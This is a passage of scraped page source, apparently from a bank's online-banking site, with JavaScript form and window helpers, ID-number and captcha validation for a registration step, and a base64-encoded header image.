document.frmmain.elements[i].value+'~'+document.frmmain.fldfilerefno.value; } if(document.frmmain.elements[i].checked==true) { flgbtn=true; document.frmmain.flddelrefno.value = document.frmmain.elements[i].value+'~'+document.frmmain.flddelrefno.value; } } } if(flgbtn==false){ alert("Please select a file to remove"); return false; } document.frmmain.fldSectionId.value = p_sectionid ; //document.frmmain.fldPrevRequestId.value = p_prevrequestid; return SendTxnRequest(p_requestid.substring(5,7),p_requestid.substring(2,5)); } //----------------------------------------------------------------------------------------- function checkForAuditLogFrame() { var l_auditWindName = self.name; // setting self.name in l_auditWindName // compare it with frame self.name if it matches with SSR or VAL frame name // put modal window. if(l_auditWindName=="frame_audit_txn"){ if(document.getElementById("divsession")) { document.getElementById("divsession").style.display = ""; } } } //----------------------------------------------------------------------------- function displayBackwardCompatibilityStatusMessage () { return; } //----------------------------------------------------------------------------- function fnToggleComponent ( toggledivid , urlimageopen , urlimageclose ) { var sectionId = document.getElementById (toggledivid); if (sectionId == null) { return; } var imgSrc = document.getElementById ("img_" + toggledivid); if (imgSrc == null) { return; } if (sectionId.style.display == '' || sectionId.style.display == 'block') { sectionId.style.display = 'none'; imgSrc.src = urlimageclose; } else { sectionId.style.display = ''; imgSrc.src = urlimageopen; } } //----------------------------------------------------------------------------- //----------------------------------------------------------------------------------------- function custom_alert(output_msgs, title_msg) { var out_msg; if ($.isArray (output_msgs)) { if (output_msgs.length > 1) { out_msg = "<ul><li>"; for (i = 0; i < output_msgs.length; i++) { out_msg += output_msgs [i]; if (i + 1 != output_msgs.length) { out_msg += "</li><li>"; } } out_msg = "</li></ul>"; } else { out_msg = output_msgs [0]; } } else { out_msg = output_msgs; } $("<div></div>").html(out_msg).dialog({ title: title_msg, resizable: false, modal: true, buttons: { "Ok": function() { $( this ).dialog( "close" ); } } }); } //------------------------------------------------------------------------ //------------------------------------------------------------- function staticwindow_open ( p_formObj , p_windowTitleText , p_id ) { if (!p_formObj){ p_formObj = document.frmEntitySwitch; } var window_name = 'process_' + p_id; var frm_action; var l_windowObj = window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width=' + window.screen.width + ',height=' + window.screen.height ); l_windowObj.moveTo(0, 0); l_windowObj.resizeTo(screen.width, screen.height); p_formObj.target = window_name; if (p_formObj.title || p_formObj.title != '') { p_formObj.title.value = p_windowTitleText; } else { var l_inputTitle = document.createElement ('input'); l_inputTitle.type = 'hidden'; l_inputTitle.name = 'title'; l_inputTitle.value = p_windowTitleText; p_formObj.appendChild (l_inputTitle); } p_formObj.fldRequestId.value = p_id; frm_action = p_formObj.action; p_formObj.action = "process.jsp" if (l_windowObj) { l_windowObj.focus (); } p_formObj.submit (); p_formObj.action = frm_action; } //---------------------------------------------------------------------------- function fnGetAppLayRelWidth () { return l_appLayWidth - 25; } //---------------------------------------------------------------------------- </script><div id="divsession" class="modalWhitebackground" style="display:none" ></div><div id="errorTab" style="display:none;height:auto;width:100%;cursor:hand; " ></div><div id="printWarning" class="noPrintWarning" ><div class="iconHolder warningMsg" ></div><div class="alertmsgbox" ></div></div><div id="dialog-modal-error" title="Messages" ><table id="error-dialog-table" style="width:100%;display:none" cellpadding="1" cellspacing="1" ></table></div><html lang="en" ><head><!--[if lte IE 7]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.css" type="text/css" /><![endif]--><![if (!IE) | (gte IE 8)]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.uri.css" type="text/css" /><![endif]><meta name="viewport" content="width=device-width; initial-scale=1; minimal-ui" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" ></meta><meta HTTP-EQUIV="no-cache" ></meta><title></title><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/Ajax.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/rsa_compiled.js" ></script><script language="JavaScript" type="text/JavaScript" > function fnBack(){ $("input[type='button']").prop('disabled',true); document.frmmain.fldRequestId.value='RRUSR11'; document.frmmain.submit(); } function fnSubmit(){ $("input[type='button']").prop('disabled',true); if($("#fldnicno").prop("checked")) { if($.trim($("#fldIdentificationNoNic").val())=='' || $.trim($("#fldIdentificationNoNic").val()).length !=$("#fldIdentificationNoNic").val().length ||$.trim($("#fldIdentificationNoNic").val()).length < 14 || /\s/g.test($('#fldIdentificationNoNic').val())){ $("#fldIdentificationNoNicInline").css("display","block"); $("#fldIdentificationNoNic").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); } } else if($("#fldpassportno").prop("checked")) { if($.trim($("#fldIdentificationNoPass").val())=='' || $.trim($("#fldIdentificationNoPass").val()).length !=$("#fldIdentificationNoPass").val().length ||$.trim($("#fldIdentificationNoPass").val()).length < 5 || /\s/g.test($('#fldIdentificationNoPass').val())){ $("#fldIdentificationNoPassInline").css("display","block"); $("#fldIdentificationNoPass").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); } } if(validateCaptcha()){ document.frmmain.fldRequestId.value='RRUSR03'; document.frmmain.submit(); } else{ return false; } } function toggleIdentificationNo(selradio) { $("#fldIdentificationNoNic").val(''); $("#fldIdentificationNoPass").val(''); $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); if(selradio.id=='fldnicno'){ $("#fldIdentificationNoPass").prop('disabled',true); $("#fldIdentificationNoPass").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoNic").prop('disabled',false); $("#fldIdentificationNoNic").css('background',""); } else if(selradio.id=='fldpassportno'){ $("#fldIdentificationNoNic").prop('disabled',true); $("#fldIdentificationNoNic").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoPass").prop('disabled',false); $("#fldIdentificationNoPass").css('background',""); } } function isValid(evt) { var charCode = (evt.which) ? evt.which : evt.keyCode; var retVal = ((charCode >= 48 && charCode <= 57) || ///0-9 Number ASCII (48~57) (charCode >= 65 && charCode <= 90) || ///A~Z Upper Case Alphabet ASCII (65~90) (charCode >= 97 && charCode <= 122) ///a~z Lower Case Alphabet ASCII (97~122) ); if (retVal ==false) { return false; } else { return true; } } </script></head><body class="workarea" onload="getCaptchaImage();" style="width:auto;" ><style> #headerWrapper { background: #fff; border-bottom: 1px solid #ececec; position: absolute; width: 100%; height: 72px; top: 0; left: 0; margin: 0; padding: 0; border: 0; } #header { padding: 0; position: relative; width: 960px; margin: 0 auto; border: 0; } #_topMenu { width: 100%; height: 70px; background-repeat: no-repeat; background-image: url(data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAABkAAD/4QMvaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjYtYzAxNCA3OS4xNTY3OTcsIDIwMTQvMDgvMjAtMDk6NTM6MDIgICAgICAgICI+IDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+IDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bXA6Q3JlYXRvclRvb2w9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5MzUzN0VBQzI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo5MzUzN0VBRDI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjkzNTM3RUFBMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjkzNTM3RUFCMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+/+4ADkFkb2JlAGTAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEB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